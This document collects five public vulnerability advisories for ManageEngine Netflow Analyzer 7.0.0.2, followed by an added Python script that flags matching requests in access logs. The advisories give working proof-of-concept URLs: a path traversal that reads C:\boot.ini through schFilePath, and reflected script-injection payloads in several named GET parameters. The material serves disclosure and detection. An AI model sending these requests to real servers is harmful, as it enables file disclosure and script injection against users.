<!--
# Exploit Title: Path traversal vulnerability in Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8925
# Category: webapps

1. Description

An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. An Absolute Path Traversal vulnerability in the Administration zone, in /netflow/servlet/CReportPDFServlet (via the parameter schFilePath), allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via any file name, such as a schFilePath=C:\boot.ini value.

2. Proof of Concept

Original request:
http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\AdventNet\ME\NetFlow\help\ciscoQoS.pdf

http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\boot.ini

3. Solution:

The product is discontinued. Update to the latest version of this product.
-->

<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8926
# Category: webapps

1. Description

An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/popup1.jsp file via these GET parameters: bussAlert, customDev, and selSource.

2. Proof of Concept

http://localhost:8080/netflow/jspui/popup1.jsp?selSource=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=true

Parameters: bussAlert, customDev and selSource

3. Solution:

Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->

<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8927
# Category: webapps

1. Description

An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/scheduleConfig.jsp file via these GET parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10, and val11.

2. Proof of Concept

http://localhost:8080/netflow/jspui/scheduleConfig.jsp?rowIncrement=true&match_flag=true&removeRows=&rep_Type=cust&schSource=interface&rep_schedule=daily&performTask=&disp=&stHr=09&edHr=17&filterFlag=false&selectDeviceDone=&devSrc=auxz6%22%3e%3cscript%3ealert(1)%3c%2fscript%3etqq9idmqry5&popup=false&task=add&f=&mset=&getFilter=false&resetter=true&excWeekModify=&mailReport=true&stH=09&edH=17&boxChecked0=&selCh0=&threshRow=1&schName=www&schDesc=qqq&sourcesel=40&repType=cust&logicOp=AND&sel0=SrcAddr&val10=&rowCount=1&repSchedule=Daily&dailysel1=02&dailysel2=00&dailysel3=1&dmsg=&weeklysel1=1&weeklysel2=02&weeklysel3=00&weeklysel4=3&monthsel1=1&monthsel2=02&monthsel3=00&monthlysel4=5&repGenTime=2019-02-18+14%3A55&oncesel4=1&omsg=&mailreport=mailreport&emailId=

Parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10 and val11

3. Solution:

Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->

<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8928
# Category: webapps

1. Description

An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in /netflow/jspui/userManagementForm.jsp via these GET parameters: authMeth, passWord, pwd1, and userName.

2. Proof of Concept

http://localhost:8080/netflow/jspui/userManagementForm.jsp?moveLR=&moveRL=&moveLRIP=&moveRLIP=&moveLRBuss=&moveRLBuss=&addField=&authMeth=fgcuh%3e%3cscript%3ealert(1)%3c%2fscript%3eyxcpve1able&createRadUser=false&radSet=&userName=qqq&radiusUser=Authenticate+locally&pwd1=qqqqqq&passWord=qqqqqq&priv=Guest

Parameters: authMeth, passWord, pwd1 and userName

3. Solution:

Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->

<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8929
# Category: webapps

1. Description

An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/selectDevice.jsp file in these GET parameters: param and rtype.

2. Proof of Concept

http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=collopts&param=g3oxp%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C!--q5uad

Parameters: param and rtype

3. Solution:

Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
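
A defender-side check for the five issues above, as an added example (not part of the original advisories or the vendor's code): it classifies logged request targets against the endpoints and GET parameters the advisories name. The install root is an assumption inferred from the first advisory's original request path, and the sample request targets are constructed.

```python
import ntpath
from urllib.parse import parse_qs, urlsplit

# Assumption: install root inferred from the advisory's "original request" path.
INSTALL_ROOT = r"C:\AdventNet\ME\NetFlow"
PDF_SERVLET = "/netflow/servlet/CReportPDFServlet"
# Endpoint -> (CVE, GET parameters), as listed in the advisories above.
XSS_ENDPOINTS = {
    "/netflow/jspui/popup1.jsp": ("CVE-2019-8926", {"bussAlert", "customDev", "selSource"}),
    "/netflow/jspui/scheduleConfig.jsp": ("CVE-2019-8927", {
        "devSrc", "emailId", "excWeekModify", "filterFlag", "getFilter",
        "mailReport", "mset", "popup", "rep_schedule", "rep_Type", "schDesc",
        "schName", "schSource", "selectDeviceDone", "task", "val10", "val11"}),
    "/netflow/jspui/userManagementForm.jsp": ("CVE-2019-8928", {
        "authMeth", "passWord", "pwd1", "userName"}),
    "/netflow/jspui/selectDevice.jsp": ("CVE-2019-8929", {"param", "rtype"}),
}
MARKUP = set('<>"')  # characters that let a reflected value break out of HTML


def outside_root(path, root=INSTALL_ROOT):
    """True if a Windows path, with '..' collapsed, is not under root."""
    norm = ntpath.normcase(ntpath.normpath(path))
    base = ntpath.normcase(ntpath.normpath(root))
    return not (norm == base or norm.startswith(base + "\\"))


def classify(request_target):
    """Return (cve, parameter) findings for one logged request target."""
    parts = urlsplit(request_target)
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes
    findings = []
    if parts.path == PDF_SERVLET:
        if any(outside_root(v) for v in query.get("schFilePath", [])):
            findings.append(("CVE-2019-8925", "schFilePath"))
    cve, params = XSS_ENDPOINTS.get(parts.path, ("", set()))
    for name in sorted(params):
        if any(MARKUP & set(v) for v in query.get(name, [])):
            findings.append((cve, name))
    return findings


if __name__ == "__main__":
    # Constructed sample: request targets as they would appear in an access log.
    sample = [
        r"/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\AdventNet\ME\NetFlow\help\ciscoQoS.pdf",
        r"/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\boot.ini",
        "/netflow/jspui/selectDevice.jsp?rtype=collopts&param=x%22%3E%3Cb%3E",
    ]
    for target in sample:
        print(classify(target) or "ok", target)
```

Free-text fields such as passWord can legitimately contain the flagged characters, so treat a hit on those parameters as a lead to review rather than a confirmed event.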